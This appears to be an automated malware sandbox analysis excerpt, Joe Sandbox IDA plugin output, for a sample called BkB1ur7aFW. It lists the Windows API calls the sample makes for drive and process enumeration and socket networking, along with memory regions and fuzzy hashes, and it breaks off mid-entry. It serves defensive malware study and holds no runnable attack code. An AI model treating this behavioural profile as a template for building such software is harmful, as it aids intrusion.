                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: dc17703ef8453152620b1b8d74a62287bc2ca97bbf3602a76db5aed656d86935
                                                              • Instruction ID: 8ee467bdc7305fb397c13858fd0925efe5808ddc0fbf171c4e2e35471da9906e
                                                              • Opcode Fuzzy Hash: dc17703ef8453152620b1b8d74a62287bc2ca97bbf3602a76db5aed656d86935
                                                              • Instruction Fuzzy Hash: E521F8FB15C115FE7205D1A52B58AFA7BBED6CB730B32846BF803E2582E3944B094132
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: d6c34347125cbd406ed3faae93bab3d458dde102ae562d9ee87fdd0e6b7cf40c
                                                              • Instruction ID: 74954a63e0c12f8411d85d0b6bc5dfcbef3b322e7b39a80f63bf61282f80bd20
                                                              • Opcode Fuzzy Hash: d6c34347125cbd406ed3faae93bab3d458dde102ae562d9ee87fdd0e6b7cf40c
                                                              • Instruction Fuzzy Hash: 4E2107FB11C215FE710591A52B586FE6BBED59F330B32842BF803D6582E3844B094072
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID: ZPR
                                                              • API String ID: 2623510744-1010662857
                                                              • Opcode ID: e909b11c46d885e783fe52956deb201e06a91b88cc96aba945852d999f59803b
                                                              • Instruction ID: ca02da74b82672b5f6e45336d54fdd2888c6b46fce37d64be2adef61a4d83f17
                                                              • Opcode Fuzzy Hash: e909b11c46d885e783fe52956deb201e06a91b88cc96aba945852d999f59803b
                                                              • Instruction Fuzzy Hash: 6E21F5EB1AC311BD720A91551F55AF66A7EE6DF3307328436B403C6AC3E3C88A0A9171
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 41a519d788f20b798dedb8b219e623ae7a5197bec2655244ffc99368fc7d5d6d
                                                              • Instruction ID: 92df01de699eaebd098676903fc4a7225c8746b5469f806f86bf9711b9396e4b
                                                              • Opcode Fuzzy Hash: 41a519d788f20b798dedb8b219e623ae7a5197bec2655244ffc99368fc7d5d6d
                                                              • Instruction Fuzzy Hash: 7F213BFB11C125FE750691A127586FE2FAFD69B730B32846BF803E6546F3844B094072
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID: FD %s:%d sclose(%d)
                                                              • API String ID: 2781271927-3116021458
                                                              • Opcode ID: a5eeea0e9a00efc6f979cf15392249856f234906be44492fcd6ae0abef41039a
                                                              • Instruction ID: df0a0d0ad62bf3f87a5cb04dc8f25dfa9a6562ced6640fa3ef640aad2b388d41
                                                              • Opcode Fuzzy Hash: a5eeea0e9a00efc6f979cf15392249856f234906be44492fcd6ae0abef41039a
                                                              • Instruction Fuzzy Hash: F6D0A733A0A2313B85316A98BC49C6F7BA8DEC6F60B060C58F98077244D2219D0183F3
                                                              APIs
                                                              • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004BB29E,?,00000000,?,?), ref: 004BB0BA
                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004A3C41,00000000), ref: 004BB0C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID:
                                                              • API String ID: 374722065-0
                                                              • Opcode ID: 90ba5852ea03459cdf7e664a0e59c9cf8802479c6c9b38974e35ea5d530a1a75
                                                              • Instruction ID: 77284bc974e0a35b42523cc4aef5dd718beb31e6816e82a6a7c404d00eeb0a1e
                                                              • Opcode Fuzzy Hash: 90ba5852ea03459cdf7e664a0e59c9cf8802479c6c9b38974e35ea5d530a1a75
                                                              • Instruction Fuzzy Hash: ED01D8363042009FCA206A689C84FFBB399FF89364F140B55F978932D1D76AED5087B6
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 004A4AA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 3c2dabfd9d5f523806e1461659fe4e1c51d7aea75d89323c9b866d90c63170eb
                                                              • Instruction ID: eccfeed8e70c12296adf55becd942a297a2739fe74a9c35b77ecaefc7fd2ac58
                                                              • Opcode Fuzzy Hash: 3c2dabfd9d5f523806e1461659fe4e1c51d7aea75d89323c9b866d90c63170eb
                                                              • Instruction Fuzzy Hash: FA51D4B06043008BE7309B65DD4972B76D4AFE6319F04093EE98A867D1E7BCF844C71A
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 0fbca62a12cd1b41af6b93643f1904ce005f2d599e57d82a4a1c50f96e3e223e
                                                              • Instruction ID: 1a65fe93c4d4830529cc6cda74f28a0f2ab1ed003561c8e84894c4183933fdd9
                                                              • Opcode Fuzzy Hash: 0fbca62a12cd1b41af6b93643f1904ce005f2d599e57d82a4a1c50f96e3e223e
                                                              • Instruction Fuzzy Hash: F02106FB2AC311BDB21A95501F16AF65A3EE6DF230B368426B007C65C3F3854A4A80B1
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: c74e551a7682fee8a412d34dea39f0302793dcca6fd9d91047548ef6f576c1fd
                                                              • Instruction ID: 5104e73728e520af0b44baff0d460611dce77ba3c29bd146c008f793684defa7
                                                              • Opcode Fuzzy Hash: c74e551a7682fee8a412d34dea39f0302793dcca6fd9d91047548ef6f576c1fd
                                                              • Instruction Fuzzy Hash: 7A11B1FB26C321BD714A95951B1AAFA567EE2DF230B32C436B403D55C3E3C94A4E81B1
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703AB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036373690.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 2f15d24bb0366e9db61c8cd8a6c86b895e483abb2650e4968cb4c63a60f4c582
                                                              • Instruction ID: 7c1b9c4d18811ede2e2538c4f85dedf5d20d987f7af330dc2a059e3af2f85fcf
                                                              • Opcode Fuzzy Hash: 2f15d24bb0366e9db61c8cd8a6c86b895e483abb2650e4968cb4c63a60f4c582
                                                              • Instruction Fuzzy Hash: 062135FA26C311BD720A81545F06AB66B7EE6CF2307328425B003C65C2E3C90A0A8171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 80fd14245dc2e78d5c3edc8c9b87927e9256df39059b876e837f54f369dc025a
                                                              • Instruction ID: d2b3b89bd5fbaf01cbcf4a9ebc8cd4154d662791aaf8367b237a0b5342a82646
                                                              • Opcode Fuzzy Hash: 80fd14245dc2e78d5c3edc8c9b87927e9256df39059b876e837f54f369dc025a
                                                              • Instruction Fuzzy Hash: 3811AFF600C394EFE306A2B41A595F97FBADA5F230F3644AFE846969C3E34447058222
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: b95aaafb156f1c07fe9042872c5e41012df5552ba1243fde25aa2f37f925af5b
                                                              • Instruction ID: 289565364f030487e3a2e74458bfb29f9f64b01176a2c3b8250769d02d9e52c8
                                                              • Opcode Fuzzy Hash: b95aaafb156f1c07fe9042872c5e41012df5552ba1243fde25aa2f37f925af5b
                                                              • Instruction Fuzzy Hash: A101F7F645C225FE710962A12B596FA6EFFE65F230B328427F803A5582B38547044062
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 9133053884332a714d22bbc4b20a85bf0bc71aa08d5602ebb086db210eea5d25
                                                              • Instruction ID: f79d68688ae8ffc03f12570025c512b1c282e9cb18ca7587bbfdbced9503c4a3
                                                              • Opcode Fuzzy Hash: 9133053884332a714d22bbc4b20a85bf0bc71aa08d5602ebb086db210eea5d25
                                                              • Instruction Fuzzy Hash: 1F019EF655C622EDA20661E0065E7F63EEB575F531F2308139447A94C2F341C7054091
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: d981034a98528a5e3a6fff1a188632738efd3e7396b43375f06ba1911b4673b1
                                                              • Instruction ID: b265ac296214f095aebd2f8dbba576afa4774482c7e0713df5ceae198a70229c
                                                              • Opcode Fuzzy Hash: d981034a98528a5e3a6fff1a188632738efd3e7396b43375f06ba1911b4673b1
                                                              • Instruction Fuzzy Hash: 2F01F9EA158625FE650A62A5175D6F97FAFA66F230B328823F843E6582B34447044162
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: e8b9fbdb2aa7198e877aab7ab17fe03c40c76ca1dd246519cf01124c9df3bffe
                                                              • Instruction ID: b38461f3a2bc048da81c884bbde12e5a97fafbc15deb69ba2ca867adbf76b5f1
                                                              • Opcode Fuzzy Hash: e8b9fbdb2aa7198e877aab7ab17fe03c40c76ca1dd246519cf01124c9df3bffe
                                                              • Instruction Fuzzy Hash: 4CF049F6408315EF610AA2B112595B97FEBAB5F330B224867E803F6682E35447008052
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 004BAFD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID:
                                                              • API String ID: 3358416759-0
                                                              • Opcode ID: 0730949898dde383e1335b43e5ec285533dbd09e92aab88a6d110dd90ac5e605
                                                              • Instruction ID: 14c4ddf4a9b20a01932bc62e11864f55677e5a938b32ad771d54fb99c1322434
                                                              • Opcode Fuzzy Hash: 0730949898dde383e1335b43e5ec285533dbd09e92aab88a6d110dd90ac5e605
                                                              • Instruction Fuzzy Hash: C4119670808784D9EB268F18D8027F6B3F4EFD0328F109619E5D942150F7769AD68BD2
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 5e255fe195be0a4fb1e0af81b9fca98f1652cc7d3dad1987015372fd3a31f821
                                                              • Instruction ID: e56f9b800eaf6b4f7cc2b248ea85db7580c29af36ed5e3cbc7b21cf74b079559
                                                              • Opcode Fuzzy Hash: 5e255fe195be0a4fb1e0af81b9fca98f1652cc7d3dad1987015372fd3a31f821
                                                              • Instruction Fuzzy Hash: AEF08BF5558532DEA60A623205D93F83AE75B2F130F320037A943D6985D71483444012
                                                              APIs
                                                              • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004BA97F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID:
                                                              • API String ID: 2809346765-0
                                                              • Opcode ID: b7829f4e7694bc3656e3453eebbfdc5abf1b23ddf46d1b2d752baddde17bfeb0
                                                              • Instruction ID: 0dbca1266fa15346a5ae4e82f34c2a52d7e4a61d30189d79b06a909b9e482613
                                                              • Opcode Fuzzy Hash: b7829f4e7694bc3656e3453eebbfdc5abf1b23ddf46d1b2d752baddde17bfeb0
                                                              • Instruction Fuzzy Hash: 8E01A7B1B007109FD7148F14D845B5BB7A5EF84720F0A8559E9982B361C331AC109BE1
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: f93384da0c934f2b2827ee7b84fcb1ce830508889941343e0bd82332409cbe75
                                                              • Instruction ID: 74eb368e985dd2ffc1d9963fc2c128058b8d1e999c82252c5c07f686a10c5274
                                                              • Opcode Fuzzy Hash: f93384da0c934f2b2827ee7b84fcb1ce830508889941343e0bd82332409cbe75
                                                              • Instruction Fuzzy Hash: D0F08BF951C662DFEB0A9AB061CD2FC3BFBAF5F325F210857E446915C2DB5407418522
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: 915b1ff10983301454d5c9089291127b4ce0b05f2a39710312219b3323ffeece
                                                              • Instruction ID: a4011a2759377030395456d4562cc4132281ca3a782b5ec90863c9535a7a91ed
                                                              • Opcode Fuzzy Hash: 915b1ff10983301454d5c9089291127b4ce0b05f2a39710312219b3323ffeece
                                                              • Instruction Fuzzy Hash: 10F054E9E1C1629DEA0151B015552F77FFB670F662B215C43D146D99C2F345CF078491
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,004A712E,?,?,?,00001001,00000000), ref: 004BA90C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 2ed9355244da5767b3d47ced87674179ca58032c25e95c8ed672de098deb4073
                                                              • Instruction ID: 340794312a52ca9d269ea0ef81e0e8fc9eca7c059836edd6ba5ab2e8638f2705
                                                              • Opcode Fuzzy Hash: 2ed9355244da5767b3d47ced87674179ca58032c25e95c8ed672de098deb4073
                                                              • Instruction Fuzzy Hash: 36F06DB5109308BFD2209E01DC44DABBBEDEFC9754F05496DF948233118270AE20DAB6
                                                              APIs
                                                              • socket.WS2_32(?,004BB280,00000000,-00000001,00000000,004BB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004BAF67
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID:
                                                              • API String ID: 98920635-0
                                                              • Opcode ID: 6a0df4ed29e3e61940e3a1ba6a2062037b9c95548fdebac5f8530313ae3d5c27
                                                              • Instruction ID: d8e01cb142391b075c6d5d7dca168c0732e541fa90ea29cc9f67ce70f9cf88db
                                                              • Opcode Fuzzy Hash: 6a0df4ed29e3e61940e3a1ba6a2062037b9c95548fdebac5f8530313ae3d5c27
                                                              • Instruction Fuzzy Hash: 1BE0EDB6A092216BD654DE1CE8449EBF369EFC8B20F094A4AB85467304C330AC50C7F2
                                                              APIs
                                                              • GetLogicalDrives.KERNELBASE(?,?,000096CF,-5E0F7D11,-5E0F7D11), ref: 0713050A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036256722.0000000007130000.00000040.00001000.00020000.00000000.sdmp, Offset: 07130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7130000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID:
                                                              • API String ID: 999431828-0
                                                              • Opcode ID: efb768bebc91752717ed9b2fd9792c4964b02a385341dd5feb134bdfa007dfbb
                                                              • Instruction ID: cc7d6271603499895da5886da05ce7ec8f4264390060919e027616d07ef4fc3e
                                                              • Opcode Fuzzy Hash: efb768bebc91752717ed9b2fd9792c4964b02a385341dd5feb134bdfa007dfbb
                                                              • Instruction Fuzzy Hash: 63D022C8668069F9A800307409892FE2AFF279F310FA328437406F2CC063849B828067
                                                              APIs
                                                              • closesocket.WS2_32(?,004B9422,?,?,?,?,?,?,?,?,?,?,?,w3J,00884C60,00000000), ref: 004BB04D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: closesocket
                                                              • String ID:
                                                              • API String ID: 2781271927-0
                                                              • Opcode ID: b968801cb5afc7ea571900a0c8c75e077e19f22900440d31148d598c4b804207
                                                              • Instruction ID: f64a009063c868b90f7d5cbc385a17eb1e0e0c741e771a11656a7003a7bf3128
                                                              • Opcode Fuzzy Hash: b968801cb5afc7ea571900a0c8c75e077e19f22900440d31148d598c4b804207
                                                              • Instruction Fuzzy Hash: 21D0C23430020157CA20AA18C8C4AAB732BBFC1310FA8CB68E02C4A251D73FCC4386A1
                                                              APIs
                                                              • ioctlsocket.WS2_32(?,8004667E,?,?,0042AF56,?,00000001), ref: 004567FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocket
                                                              • String ID:
                                                              • API String ID: 3577187118-0
                                                              • Opcode ID: 6fb467786359e96f6a6c8c9c827a236451034f883f79fe09f33dcb7e7097999b
                                                              • Instruction ID: b1655764e4dcdbc3f01eeb42c5cdaf68e392172bccfb74209a509df258ccb336
                                                              • Opcode Fuzzy Hash: 6fb467786359e96f6a6c8c9c827a236451034f883f79fe09f33dcb7e7097999b
                                                              • Instruction Fuzzy Hash: 9DC080F121C101BFD70C8714D455B2F77E8DB84355F01581CB086D1180FA345990CF17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7be7ba21487e0fd27d26e401db0a11579cbf8bb53efe3378d8228092910c99dc
                                                              • Instruction ID: df2d35ec4257825a1f288274785b8fa256e3aee20999cc9547e33cd78cc13a27
                                                              • Opcode Fuzzy Hash: 7be7ba21487e0fd27d26e401db0a11579cbf8bb53efe3378d8228092910c99dc
                                                              • Instruction Fuzzy Hash: AE418BEBA2D125BC7509C0816F54AFB276EE1DFB30B32C83AF806D9185E3559ECA5031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3a9c669a8080d8f9dd5fff4d2a0295e19fd8e7afba92581de4897d88459e92e
                                                              • Instruction ID: 6efcb46f491bfb41cd84a4917643c15781997c1aa5243bc2333731c14221c7c3
                                                              • Opcode Fuzzy Hash: f3a9c669a8080d8f9dd5fff4d2a0295e19fd8e7afba92581de4897d88459e92e
                                                              • Instruction Fuzzy Hash: 8C4198EBA2D125BD7509C0822B10AFB672EE1DF730B32C43AF807D9185E3948ECA4031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f31bb7a092571911d5e5cd4cef12e372ef262d7f1db4e31a7086c011449e340
                                                              • Instruction ID: 39fc9323a0ee9fc274070b7d037f7d651968547eedb7acf3d35aec2e06846eef
                                                              • Opcode Fuzzy Hash: 4f31bb7a092571911d5e5cd4cef12e372ef262d7f1db4e31a7086c011449e340
                                                              • Instruction Fuzzy Hash: DE417AEBA2D125BD7509C0822F54EFB676DE1DB730B32C436F806D9185E3959ECA5031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 198d4eab96ef53ed5f28702da97183fc50321111107f802e2e2a2f150f044c62
                                                              • Instruction ID: 9967d5aa0d7091a28610605fd5b097f6629d8706f69ddd3966e67cc931004ad6
                                                              • Opcode Fuzzy Hash: 198d4eab96ef53ed5f28702da97183fc50321111107f802e2e2a2f150f044c62
                                                              • Instruction Fuzzy Hash: E4417AEBA2D125BD7509C0826F14AFB676DE1DB730B32C43AF807D9185E3959ECA5031
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff84ae598f775c2070adef685b8e12f0dd92036764fd01041cb746a375b83c54
                                                              • Instruction ID: 02b64e06acefeed82504d500e2c7c473454d758d7daee253a9f913902d7b56da
                                                              • Opcode Fuzzy Hash: ff84ae598f775c2070adef685b8e12f0dd92036764fd01041cb746a375b83c54
                                                              • Instruction Fuzzy Hash: AB4179EBA2D125BD7609C4822B10AFB276DD1DB730B32C83AF806D9186E3559ECA5031
                                                              Memory Dump Source
